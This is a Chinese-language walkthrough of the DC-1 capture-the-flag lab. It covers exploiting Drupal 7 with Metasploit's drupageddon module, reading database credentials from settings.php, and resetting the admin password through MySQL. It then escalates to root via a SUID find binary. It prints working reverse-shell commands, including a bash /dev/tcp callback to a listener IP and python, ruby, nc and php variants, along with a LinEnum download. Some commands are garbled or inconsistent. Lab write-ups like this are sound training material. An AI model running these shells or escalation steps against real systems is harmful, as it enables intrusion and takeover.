靶机介绍
这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:(http://www.five86.com/dc-1.html)
信息搜集
直接访问页面,根据经验应该为drupal的网站,从web入手,找该cms漏洞利用工具
同时上nmap进行端口扫描,查看开启的服务及是否有敏感信息文件
可知开放22、80、110端口,linux主机 网站CMS确定为Drupal版本号为7
渗透实战
- 直接msf查询该Drupal模块并直接利用drupal_drupageddon模块获取webshell
- 查看本地文件目录发现flag1.txt
meterpreter > sysinfo
Computer : DC-1
OS : Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
Meterpreter : php/linux 复制
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you
# 提示查看配置文件 复制
- 通过在网站根目录查找关键字,找到配置文件为site/setting.php,其中有帐号密码
find . -type f | xargs grep "password"
- 打开配置文件,发现flag2,并提示爆破不能进入后台,尝试其他方式,先连接本地mysql数据库查看是否有后台明文密码
meterpreter > cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
); 复制
注意
- 切换到shell连接mysql,发现不能回显,无法进入交互界面
- 用bash回弹一个shell
- 本地监听2222端口
nc -lvp 2222
- 反弹bash,获取到一个可以交互的shell
python -c "import pty;pty.spawn('/bin/bash')" # 获取一个交互shellbash -i >& /dev/tcp/172.16.0.10/2222 0>&1 # 反弹bash
- 重新连接本地数据库
mysql -udbuser -pR0ck3t
- 查看网站用户账号密码,发现密码经过加密
select * from users \G;
mysql> select * from users \G;
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: [email protected]
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: [email protected]
data: b:0; 复制
- 根据提示需要进入后台,这个密文用john工具也无法解密,那直接把admin密码改掉,强上后台,查看网站本地发现有脚本对设置的密码进行加密,针对弱口令123456根据网站规则加密
php scripts/password-hash.sh 123456
php scripts/password-hash.sh 123456
password: 123456
hash: $S$DqoimnZKpzNbUFgNiiGexSM.Z29/UXOFtPunnZY0nSHhJBi3RdNP
www-data@DC-1:/var/www$ 复制
- 将加密的密码更新到数据库中
update users set pass='SDRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu' where uid=1;
- 通过robots.txt知道登录地址,通过admin登录成功查看flag3
- 使用设置好的密码:123456,登陆admin账户,在content页面发现了flag3
- 提示我们特殊的权限有助于发现隐藏内容,这里提到了shadow这个单词,于是立即想到/etc/passwd,先打开看看再说
- 查看用户发现flag4用户,直接打开flag4.txt,提示要进入root目录,即需要提权至root用户
- 查看权限文件,发现可以通过find命令suid提权
- 可使用提权辅助脚本
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh 复制
- 或者直接查看权限命令
find / -perm -u=s -type f 2>/dev/nullfind / -perm /4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs 复制
- find命令suid提权
touch test # 创建一个空文件find test -exec 'whoami' \; #查看是否提权find test -exec '/bin/sh' \;#将root的bash反弹
-----------至此获得所有的flag!!!---------
总结
- 反弹bash的不同脚本命令,在命令交互无法返回结果时考虑换一个shell
python: python -c "import pty;pty.spawn('/bin/bash')"
ruby: ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
nc: nc -e /bin/bash ip port
php:<?php
$sock=fsockopen("ip",port);//自己的外网ip,端口任意
exec("/bin/sh -i <&3 >&3 2>&3");
?> 复制
- SUID提权常用反弹shell
find test -exec '/bin/sh' \;
- 提权辅助脚本可以使用LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh